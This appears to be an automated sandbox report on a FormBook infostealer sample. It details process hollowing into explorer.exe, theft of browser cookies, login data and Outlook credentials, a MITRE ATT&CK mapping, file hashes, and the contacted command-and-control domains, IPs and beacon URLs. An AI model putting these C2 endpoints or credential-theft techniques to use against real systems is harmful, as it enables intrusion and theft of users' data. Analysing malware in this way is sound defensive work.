          Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.356385901.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.303378350.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.356013433.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1D945 cpuid
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exeCode function: 1_2_00B1D5D2 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Uses netsh to modify the Windows network and firewall settings
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\netsh.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Command and Scripting Interpreter          		Path Interception512
          Process Injection          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Email Collection          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Virtualization/Sandbox Evasion          		11
          Input Capture          		131
          Security Software Discovery          		Remote Desktop Protocol11
          Input Capture          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)512
          Process Injection          		Security Account Manager1
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Archive Collected Data          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Deobfuscate/Decode Files or Information          		NTDS2
          Process Discovery          		Distributed Component Object Model1
          Data from Local System          		Scheduled Transfer114
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information          		LSA Secrets1
          Remote System Discovery          		SSH2
          Clipboard Data          		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync15
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 756313 Sample: qHpeBvr9cR.exe Startdate: 30/11/2022 Architecture: WINDOWS Score: 100 30 www.19t221013d.tokyo 2->30 46 Snort IDS alert for network traffic 2->46 48 Multi AV Scanner detection for domain / URL 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 5 other signatures 2->52 10 qHpeBvr9cR.exe 19 2->10         started        signatures3 process4 file5 28 C:\Users\user\AppData\...\febcldoukq.exe, PE32 10->28 dropped 13 febcldoukq.exe 10->13         started        process6 signatures7 66 Multi AV Scanner detection for dropped file 13->66 68 Machine Learning detection for dropped file 13->68 70 Maps a DLL or memory area into another process 13->70 16 febcldoukq.exe 13->16         started        process8 signatures9 38 Modifies the context of a thread in another process (thread injection) 16->38 40 Maps a DLL or memory area into another process 16->40 42 Sample uses process hollowing technique 16->42 44 Queues an APC in another process (thread injection) 16->44 19 explorer.exe 16->19 injected process10 dnsIp11 32 www.afterdarksocial.club 162.214.129.149, 49711, 49712, 80 UNIFIEDLAYER-AS-1US United States 19->32 34 eufidelizo.com 192.185.217.47, 49707, 80 UNIFIEDLAYER-AS-1US United States 19->34 36 4 other IPs or domains 19->36 54 System process connects to network (likely due to code injection or exploit) 19->54 56 Uses netsh to modify the Windows network and firewall settings 19->56 23 netsh.exe 13 19->23         started        26 autochk.exe 19->26         started        signatures12 process13 signatures14 58 Tries to steal Mail credentials (via file / registry access) 23->58 60 Tries to harvest and steal browser information (history, passwords, etc) 23->60 62 Modifies the context of a thread in another process (thread injection) 23->62 64 Maps a DLL or memory area into another process 23->64

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          qHpeBvr9cR.exe41%ReversingLabsWin32.Trojan.Garf
          qHpeBvr9cR.exe37%VirustotalBrowse
          qHpeBvr9cR.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\febcldoukq.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\febcldoukq.exe20%ReversingLabsWin32.Trojan.FormBook

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.0.febcldoukq.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          2.2.febcldoukq.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.0.qHpeBvr9cR.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          0.2.qHpeBvr9cR.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          1.2.febcldoukq.exe.17b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.patrickguarte.com1%VirustotalBrowse
          eufidelizo.com9%VirustotalBrowse
          www.lyonfinancialusa.com0%VirustotalBrowse
          www.eufidelizo.com7%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.eufidelizo.com/henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0X100%Avira URL Cloudmalware
          http://www.patrickguarte.com/henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0X100%Avira URL Cloudmalware
          www.brennancorps.info/henz/100%Avira URL Cloudmalware
          http://www.patrickguarte.com/henz/100%Avira URL Cloudmalware
          http://www.lyonfinancialusa.com/henz/100%Avira URL Cloudmalware
          http://www.afterdarksocial.club/henz/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.patrickguarte.com
          		155.159.61.221
          		truetrueunknown
          eufidelizo.com
          		192.185.217.47
          		truetrueunknown
          www.lyonfinancialusa.com
          		206.233.197.135
          		truetrueunknown
          www.afterdarksocial.club
          		162.214.129.149
          		truetrue
            		unknown
            www.eufidelizo.com
            		unknown
            		unknowntrueunknown
            www.19t221013d.tokyo
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.lyonfinancialusa.com/henz/true
              • Avira URL Cloud: malware
              		unknown
              http://www.eufidelizo.com/henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0Xtrue
              • Avira URL Cloud: malware
              		unknown
              http://www.patrickguarte.com/henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0Xtrue
              • Avira URL Cloud: malware
              		unknown
              http://www.patrickguarte.com/henz/true
              • Avira URL Cloud: malware
              		unknown
              http://www.afterdarksocial.club/henz/true
              • Avira URL Cloud: malware
              		unknown
              www.brennancorps.info/henz/true
              • Avira URL Cloud: malware
              		low

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://ac.ecosia.org/autocomplete?q=-ODfqI49.5.drfalse
                		high
                https://search.yahoo.com?fr=crmas_sfp-ODfqI49.5.drfalse
                  		high
                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.356156439.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.336262975.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.303735560.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://duckduckgo.com/chrome_newtab-ODfqI49.5.drfalse
                      		high
                      https://duckduckgo.com/ac/?q=-ODfqI49.5.drfalse
                        		high
                        http://nsis.sf.net/NSIS_ErrorqHpeBvr9cR.exefalse
                          		high
                          https://www.google.com/images/branding/product/ico/googleg_lodp.ico-ODfqI49.5.drfalse
                            		high
                            https://search.yahoo.com?fr=crmas_sfpf-ODfqI49.5.drfalse
                              		high
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=-ODfqI49.5.drfalse
                                		high
                                https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search-ODfqI49.5.drfalse
                                  		high
                                  http://nsis.sf.net/NSIS_ErrorErrorqHpeBvr9cR.exefalse
                                    		high
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=-ODfqI49.5.drfalse
                                      		high
                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=-ODfqI49.5.drfalse
                                        		high
                                        http://code.jquery.com/jquery-3.3.1.min.jsnetsh.exe, 00000005.00000002.565764534.0000000003B56000.00000004.10000000.00040000.00000000.sdmpfalse
                                          		high
                                          http://gmpg.org/xfn/11netsh.exe, 00000005.00000002.565764534.0000000003B56000.00000004.10000000.00040000.00000000.sdmpfalse
                                            		high

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            192.185.217.47
                                            		eufidelizo.comUnited States
                                            		46606UNIFIEDLAYER-AS-1UStrue
                                            206.233.197.135
                                            		www.lyonfinancialusa.comUnited States
                                            		174COGENT-174UStrue
                                            155.159.61.221
                                            		www.patrickguarte.comSouth Africa
                                            		137951CLAYERLIMITED-AS-APClayerLimitedHKtrue
                                            162.214.129.149
                                            		www.afterdarksocial.clubUnited States
                                            		46606UNIFIEDLAYER-AS-1UStrue

                                            General Information

                                            Joe Sandbox Version:36.0.0 Rainbow Opal
                                            Analysis ID:756313
                                            Start date and time:2022-11-30 01:08:08 +01:00
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 9m 18s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:qHpeBvr9cR.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:9
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@7/5@7/4
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HDC Information:
                                            • Successful, ratio: 76.9% (good quality ratio 67.7%)
                                            • Quality average: 68.7%
                                            • Quality standard deviation: 34.9%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 23.211.4.90
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.

                                            Simulations

                                            Behavior and APIs

                                            No simulations

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            No context

                                            ASNs

                                            No context

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Temp\-ODfqI49

                                            Download File
                                            Process:C:\Windows\SysWOW64\netsh.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                            Category:dropped
                                            Size (bytes):94208
                                            Entropy (8bit):1.287139506398081
                                            Encrypted:false
                                            SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                            MD5:292F98D765C8712910776C89ADDE2311
                                            SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                            SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                            SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\febcldoukq.exe

                                            Download File
                                            Process:C:\Users\user\Desktop\qHpeBvr9cR.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):147968
                                            Entropy (8bit):6.182768531900874
                                            Encrypted:false
                                            SSDEEP:3072:ZOPPLcLPR2kaQ+nYwZbBPUxRC/akBYcgVg7JkWmjwaY4YFOnJSwy:ZiLcLPRi/xB8gFLm8oJSd
                                            MD5:96E050F99502FE7C52FD9B0F10202578
                                            SHA1:9ACE01D602E21FF8BF364A3BB2F46BC7FD285A7B
                                            SHA-256:C7207F58E7A5BAD6EFC38C7DDFDDBC3B32C28F6BBA01D4251A44F6BBDABE4BC3
                                            SHA-512:E09EDF0C05667FD2B684AD48F6938A0FB41C9B346197D5065FE828093789140B1A1F79279D8504428C9BA0B8049FAD9D7242015C43B746C854688AA883898E1E
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 20%
                                            Reputation:low
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......c............................,.............@.......................................@.........................................................................................................`...................|............................text.............................. ..`.rdata..$t.......v..................@..@.data....%...@......................@....00cfg.......p.......&..............@..@.voltbl."............(...................rsrc................*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\nsx95CC.tmp

                                            Download File
                                            Process:C:\Users\user\Desktop\qHpeBvr9cR.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):347987
                                            Entropy (8bit):7.481309990466636
                                            Encrypted:false
                                            SSDEEP:6144:RucNUhVyZTV2GQFRx0+EzyfkKisTiLcLPRi/xB8gFLm8oJSd:32jyZTgGL3cimiLcLPsPDC8n
                                            MD5:3D3DFD7BB3B31CA9F6A9085FF03A933F
                                            SHA1:C445CD44742166B12BC976C54EB0422E7B377C73
                                            SHA-256:74B5FDE9425C99AEB58669440FEE9206A57CAA8790635253E7F5C215973F4FB5
                                            SHA-512:202322D77C9697C31197F059DEF5879089D15CFCAA5BAA34C9603487ACC73F9E6D3EE5CD693B9523A57A24176604D588F0DFFA1A2C8E6229BCCE345485194BA8
                                            Malicious:false
                                            Reputation:low
                                            Preview:v.......,...................>...................^...........................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\rcibkfyfwn.yxq

                                            Download File
                                            Process:C:\Users\user\Desktop\qHpeBvr9cR.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):189440
                                            Entropy (8bit):7.9986039311688
                                            Encrypted:true
                                            SSDEEP:3072:8fFUilhKe4N7QY77ozZs4cwNwnj9XGKjbMVcRx0+DBhaQmmmXzbwaf6f03uftUZj:8NUhVyZTV2GQFRx0+EzyfkKisy
                                            MD5:9929DD1C8831360C68C176ADB59CA947
                                            SHA1:6CB9F8D296878B31DB696038EA01470613AEED9F
                                            SHA-256:5F3B667FA88AAD6BA21374E37014E72C2AAD0317ED1DE2C1D6DE839A61F9F541
                                            SHA-512:390D7426188347A9F64D9EEA2A9B89807443BBDAC1409DB20532CD504A56637005B75B8FE23D29E5F8187D9D1DEB238B10FE8734ED504C13AE9E5478667F0E9C
                                            Malicious:false
                                            Reputation:low
                                            Preview:..u..2..q..... .W.....0ng!Pz..a.8.4..Y.....o..%.a..u.j.:V...p....<!........P[.$..GiQO.P:.@..}~...:,..aN.i>.....-pF.j0..D...EM....4...../.$....i*..t.f.z.W. %hO........?.O[8....n...a.1....CK.7%=.....;G...ku.....=.080..J.(......`.,..U.N..xm..:..#.p\;..2..$o...t.......[.'.5b{'..a(8....Y....qo..%.a(..u.j.:.........,a.U-...Je/Z....A.E..TF.4.F.{4.p.../7.@.=..m.....s0..D....*.1.~T..0Y.'(>....Hx....\h5.......(@.3`....,.?.O[8...k...ua.1-J,..|I..9.f.....;G.G...EVz....(80..J.(..R...S.,..!.N.dxm..:.O#.d\;..2..o...t..6$..O[.'.5b.'z..a.8.4..Y.....o..%.a..u.j.:.........,a.U-...Je/Z....A.E..TF.4.F.{4.p.../7.@.=..m.....s0..D....*.1.~T..0Y.'(>....Hx....\h5.......(@.3`....,.?.O[8....n...a.1.....SI...6f....;G.G...EVz....080..J.(..R...S.,..!.N.dxm..:.O#.d\;..2..o...t..6$..O[.'.5b.'z..a.8.4..Y.....o..%.a..u.j.:.........,a.U-...Je/Z....A.E..TF.4.F.{4.p.../7.@.=..m.....s0..D....*.1.~T..0Y.'(>....Hx....\h5.......(@.3`....,.?.O[8....n...a.1.....SI...6f....;G.G...EVz....080..J.(.

                                            C:\Users\user\AppData\Local\Temp\uebzn.cef

                                            Download File
                                            Process:C:\Users\user\Desktop\qHpeBvr9cR.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):5837
                                            Entropy (8bit):6.204282040759092
                                            Encrypted:false
                                            SSDEEP:96:FMlgVSPVGToJyq52wK33eDdEA2GVnb3+EFxIhP/mny+lDMv4h3UboO:7StrNtK3eBEAHb37PnN3/O
                                            MD5:28373E2B7E834278BBFC8597EA79A659
                                            SHA1:674506B6D8C29D724529B2154D2EDCABEC4DB4EB
                                            SHA-256:C8BD6B365CE4C504FD875CC967B7B498E8D79A27E877DBF1B3128EAD638C1B57
                                            SHA-512:4B1CB1CFE3DB15617511826351738010044DB5742E2BE522D3661D36AA532EF52CD59776A211C51BC58F118CF64B126ADC0296D537ACEECE7E66E7D6D7034BDE
                                            Malicious:false
                                            Reputation:low
                                            Preview:;.....s.................U..>.s................"...B.....Z.......=.Z=.......T....>..."L.....=.\#BS3!..b.).#.X.T...;...T....>..s................... ..B.....Z..g......*.2.Z...[U.Z[U..>.."....Z......$........*.............T....>......."........a.......1....9....)........".Z...D.a.B............".A.Z...[T".....Q......a==..>......s..................s0..B......".2.....%......%..........%.Z......a....Q...Q..T...g.Y.Z..Q..T...\g.Y.....g....Q*..(.U..*..1...."....a..."........2....G.Z=..Z...[T"...>..."L.....=.\#BS3!g...b.).#.Q.T...A...T....>.>....a.v....g.v..^`.6.`.?.`.@.`.A.`.B...2.................|......~......H......J......D......F......P......R......L.....N......X......Z......T.Z...VB......>..u0...>B.........@...>B......r..W...>B......f.7.F...>B8.....j...A...>B(.......0...>BX.....n.H.Z...>BH.....z.zc...>Bx......Z.Z.`.....Z.S:.`.....Z.#:`.....Z.Z.`.....Z.S:.`....g.2..^..:.=!..:..:..:.....:.$.......^.X..:.P....b..:....=).Z.Z..P..6.[.[..P....S...Z.S:..P..6.[.S3..

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.9356650255872205
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:qHpeBvr9cR.exe
                                            File size:285325
                                            MD5:f5bea76ffac05afbe19274595801184e
                                            SHA1:93ef457bfcbc5f0860b1b7f6353ed6e9b0afd60e
                                            SHA256:40dcfb704112265b383679baa3064cd7355bd02119b117f396e1b0283342362c
                                            SHA512:3e1537258907bc3707c5cd0a54b4b5d35516e1ccb2443dfcfb493ecd931a734acf85bf2fb9aede36893b7dd12ee71baac7df48506117aee972bdab68e6a08ab3
                                            SSDEEP:6144:QBn1RomeugRHbNAtHRgt/GVl9tSvOBFRQecwcwHa:gavFRy5Ot/OceFRbfHa
                                            TLSH:2554233734CA95BBD8674633C8B3A1E6D37FE2034422115B1BD50F66B6987C3C26299B
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3(..RF..RF..RF.*]...RF..RG.pRF.*]...RF..qv..RF..T@..RF.Rich.RF.........................PE..L...ly.V.................^.........

                                            File Icon

                                            Icon Hash:b2a88c96b2ca6a72

                                            Static PE Info

                                            General

                                            Entrypoint:0x40324f
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                            Time Stamp:0x567F796C [Sun Dec 27 05:38:52 2015 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:ab6770b0a8635b9d92a5838920cfe770

                                            Entrypoint Preview

                                            Instruction
                                            sub esp, 00000180h
                                            push ebx
                                            push ebp
                                            push esi
                                            push edi
                                            xor ebx, ebx
                                            push 00008001h
                                            mov dword ptr [esp+1Ch], ebx
                                            mov dword ptr [esp+14h], 00409130h
                                            xor esi, esi
                                            mov byte ptr [esp+18h], 00000020h
                                            call dword ptr [004070B8h]
                                            call dword ptr [004070B4h]
                                            cmp ax, 00000006h
                                            je 00007F445C64C0C3h
                                            push ebx
                                            call 00007F445C64EEB1h
                                            cmp eax, ebx
                                            je 00007F445C64C0B9h
                                            push 00000C00h
                                            call eax
                                            push 004091E0h
                                            call 00007F445C64EE32h
                                            push 004091D8h
                                            call 00007F445C64EE28h
                                            push 004091CCh
                                            call 00007F445C64EE1Eh
                                            push 0000000Dh
                                            call 00007F445C64EE81h
                                            push 0000000Bh
                                            call 00007F445C64EE7Ah
                                            mov dword ptr [00423F84h], eax
                                            call dword ptr [00407034h]
                                            push ebx
                                            call dword ptr [00407270h]
                                            mov dword ptr [00424038h], eax
                                            push ebx
                                            lea eax, dword ptr [esp+34h]
                                            push 00000160h
                                            push eax
                                            push ebx
                                            push 0041F538h
                                            call dword ptr [00407160h]
                                            push 004091C0h
                                            push 00423780h
                                            call 00007F445C64EAB1h
                                            call dword ptr [004070B0h]
                                            mov ebp, 0042A000h
                                            push eax
                                            push ebp
                                            call 00007F445C64EA9Fh
                                            push ebx
                                            call dword ptr [00407144h]

                                            Rich Headers

                                            Programming Language:
                                            • [EXP] VC++ 6.0 SP5 build 8804

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x73cc0xa0.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x9e0.rsrc
